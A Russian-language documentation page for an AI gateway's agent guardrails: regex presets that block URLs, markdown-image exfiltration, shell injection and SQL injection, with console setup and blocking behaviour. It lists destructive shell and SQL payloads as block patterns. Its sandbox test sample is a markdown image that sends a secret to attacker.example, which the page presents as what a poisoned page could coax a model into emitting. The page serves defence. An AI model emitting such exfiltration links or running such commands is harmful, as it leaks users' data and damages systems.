Агентные guardrails

Когда модель управляет инструментами, опасные строки прячутся в простом содержимом: URL, который агент вот-вот извлечёт, markdown-изображение, которое клиент автоматически загрузит, rm -rf /, который модель повторяет в shell-инструмент, UNION SELECT, который она выдаёт для исполнения SQL-раннером. Контентная политика, думающая только о PII или секретах, упускает все четыре. Категория пресетов Agent существует ровно для этой формы — детерминированные правила regex, которые блокируют запрос или ответ до того, как нижестоящий инструмент вообще по нему сработает. Это сфокусированная посадочная страница для агентного сценария. Полный движок guardrail — каждый тип правила, поле, стадия и маршрут — см. в справочнике Guardrails.

1. Почему agent guardrails — отдельная поверхность

Guardrail проверяет содержимое — текст в запросе и текст в ответе. Для агента этот текст становится действием: URL извлекается, markdown рендерится, shell-строка запускается, SQL исполняется. Так что тот же движок block / mask, который вы используете для PII, выполняет двойную работу здесь — он останавливает полезную нагрузку на шлюзе до того, как слой инструментов агента сможет превратить её в побочный эффект. Категория Agent поставляет четыре пресета, каждый — правило regex с действием block, распределённые по двум стадиям:

URL Filter — input, block

Блокирует любой http(s) URL в запросе. Используйте для агентных потоков, где исходящие URL должны быть в allowlist, а не открыты. Засеянный паттерн совпадает с любым URL; отредактируйте regex, чтобы разрешить конкретные домены.

Markdown Image Block — output, block

Блокирует встраивания markdown-изображений (![alt](url)) в ответе модели. Защищает от эксфильтрации через рендеринг изображений на клиентах, автоматически загружающих удалённые изображения — классический канал утечки данных, где отрендеренный URL изображения контрабандой выносит данные.

Tool Call Shell Block — input, block

Блокирует очевидные паттерны shell-инъекции в запросе (rm -rf /, curl … | sh, wget … | bash, эскалация sudo). Используйте для агентных потоков, которые могут переслать пользовательский ввод в shell-инструмент.

SQL Injection in Output — output, block

Блокирует ответы модели, несущие классические полезные нагрузки SQL-инъекции (UNION SELECT, OR 1=1, DROP TABLE, терминаторы комментариев). Глубокая защита для инструментов, автоматически исполняющих SQL, произведённый моделью.

Два пресета проверяют input, два — output. URL Filter и Tool Call Shell Block срабатывают на запросе — до запуска модели, до тарификации квоты. Markdown Image Block и SQL Injection in Output срабатывают на ответе — после ответа модели, до того как содержимое дойдёт до вашего клиента или его слоя инструментов. Знать, на какой стадии живёт риск — это вся игра; см. Стадия input и Стадия output.

2. Примените agent guardrail в консоли

Каждый шаг здесь — действие консоли на хостед-шлюзе под вашей собственной сессией. Создание и редактирование guardrails требует Developer+ в рабочем пространстве. Только финальный вызов /v1/* использует relay-ключ sk-orca-... — сам guardrail настраивается целиком в консоли.

Откройте шаблон

В консоли откройте Guardrails, нажмите split-кнопку New guardrail и выберите пресет из категории шаблонов Agent — например, Markdown Image Block. Это засевает единственное правило block regex на правильной стадии.

Назовите и сохраните

Дайте ему имя (≤ 64 символов), например agent-rails, и сохраните. Пресет — это семя, а не замок — после добавьте три других правила Agent или отредактируйте regex свободно (см. §4).

Протестируйте в песочнице

Откройте вкладку Test внутри редактора, вставьте образец, выберите подходящую стадию и прогоните текущую политику локально — без вышестоящего вызова, без квоты (см. §3).

Привяжите ключ

Отредактируйте API-ключ и выберите agent-rails из выпадающего списка Guardrail (устанавливает guardrail_id на ключе) или пометьте его default’ом рабочего пространства. См. Привязка к ключу и Default аккаунта.

3. Докажите это перед привязкой

Докажите, что правило срабатывает, прежде чем на него укажет любой ключ. Откройте вкладку Test, выберите стадию output и вставьте ответ, который отравленная атакующим страница могла бы уговорить модель выдать:

Here is the result: ![status](https://attacker.example/track?d=secret)

Песочница оценивает текущую политику локально — ничего не отправляется вышестоящей системе, ничего не тарифицируется — и возвращает вердикт block, называющий сработавшее правило. Для A/B-сетки против корпуса состязательных и безобидных образцов eval-харнесс живёт одной вкладкой дальше.

4. Скомпонуйте и настройте правила

Четыре пресета — семена. Распространённый ход — объединить их в один guardrail agent-rails и ужесточить каждый regex под ваш стек:

Allowlist URL

Стартуйте с URL Filter, затем отредактируйте regex, чтобы он блокировал каждый URL кроме ваших санкционированных доменов — инвертируйте совпадение в allowlist вместо сплошной блокировки.

Создайте собственные детекторы

Добавьте правило regex для любой формы полезной нагрузки, которая важна вашим инструментам — паттерны RE2, линейное время, без обратных ссылок. Паттерны компилируются один раз и кэшируются между запросами.

Смешивайте правила Agent с остальным движком в одном guardrail. Сочетайте их с правилом mask PII Shield или input-блокировкой Secrets Blocker — одна политика может нести каждый тип правила, и движок сворачивает их в единый вердикт. См. Действия для block против mask против flag.

5. Как выглядит блокировка

Каждый пресет Agent использует действие block. Заблокированный запрос возвращает HTTP 400 с кодом ошибки guardrail_blocked и сообщением, называющим guardrail и сработавшее правило:

{
  "error": {
    "code": "guardrail_blocked",
    "message": "request blocked by guardrail \"agent-rails\""
  }
}

Заблокированный запрос не стоит квоты — блокировка на стадии input (URL Filter, Tool Call Shell Block) срабатывает до тарификации; блокировка на стадии output (Markdown Image Block, SQL Injection in Output) возвращает предварительно списанную квоту после отклонения ответа — и помечается skip-retry, поскольку повторный прогон того же промпта просто снова заблокировался бы. См. ошибку guardrail_blocked.

Блокировка output применяется и на стриминге. Для двух пресетов Agent стадии output block держится в обоих случаях: на нестриминговом ответе ответ проверяется до того, как вернётся, а на стриминговом ответе сканер режет поток на лету прежде, чем заблокированный контент дойдёт до клиента. См. Покрытие стриминга.

6. Guardrails — это содержимое; firewall — это вызовы инструментов

Agent guardrails — сильный первый слой, но они рассуждают о строках, а не семантике инструментов. Они блокируют shell-строку в содержимом — они не понимают, что модель выдала структурированный tool_call к деструктивному инструменту или что исходящий запрос направляется к metadata-IP. Этот слой вызовов инструментов — Firewall: он оценивает выданные моделью tool_calls, MCP tools/call и исходящий egress с вердиктами вроде allow / audit / deny / pending_approval. Эти двое компонуются — guardrails проверяют текст, firewall управляет действием.

Firewall

Управляйте выданными моделью вызовами инструментов, MCP-вызовами и egress вердиктами allow / audit / deny / approval.

Guardrails vs. Firewall

Когда тянуться к контентному guardrail против firewall вызовов инструментов — и как прогонять оба.

Защита ИИ-агентов

Полный стек управления агентом: содержимое, инструменты, MCP и egress.

Избыточная агентность

Угроза, которую адресуют эти рельсы — агент, делающий больше, чем должен.

7. Посмотрите, что сработало

Каждое сработавшее правило записывает совпадение — тип правила, действие, стадию и строку-деталь — всплывающее в ленте Matches рабочего пространства. Сама совпавшая подстрока записывается только, когда включён Log raw content, который по умолчанию выключен. Группируйте и фильтруйте ленту по guardrail, типу правила и действию, чтобы наблюдать частоту срабатываний ваших правил Agent и настраивать ложные срабатывания. См. Ленту Matches, Логирование и приватность и Настройку ложных срабатываний.

8. Куда двигаться дальше

Правила стадии output

Как работает проверка ответа для Markdown Image Block и SQL Injection in Output.

Regex-детекторы

Создайте собственные паттерны RE2, чтобы расширить правила Agent.

Эксфильтрация данных

Канал эксфильтрации, который закрывает Markdown Image Block.

Опасные вызовы инструментов

Почему одного контентного рельса недостаточно — сочетайте его с firewall.

Agent guardrails держат опасные строки вне содержимого, которое агент отправляет и получает. Чтобы управлять действиями, которые предпринимает агент — самими вызовами инструментов, MCP-вызовами и egress — поднимитесь к Firewall и прочтите базовый уровень защиты ИИ-агентов. Для полного движка guardrail см. справочник Guardrails.

​1. Почему agent guardrails — отдельная поверхность

​2. Примените agent guardrail в консоли

​3. Докажите это перед привязкой

​4. Скомпонуйте и настройте правила

Allowlist URL

Создайте собственные детекторы

​5. Как выглядит блокировка

​6. Guardrails — это содержимое; firewall — это вызовы инструментов

Firewall

Guardrails vs. Firewall

Защита ИИ-агентов

Избыточная агентность

​7. Посмотрите, что сработало

​8. Куда двигаться дальше

Правила стадии output

Regex-детекторы

Эксфильтрация данных

Опасные вызовы инструментов

1. Почему agent guardrails — отдельная поверхность

2. Примените agent guardrail в консоли

3. Докажите это перед привязкой

4. Скомпонуйте и настройте правила

5. Как выглядит блокировка

6. Guardrails — это содержимое; firewall — это вызовы инструментов

7. Посмотрите, что сработало

8. Куда двигаться дальше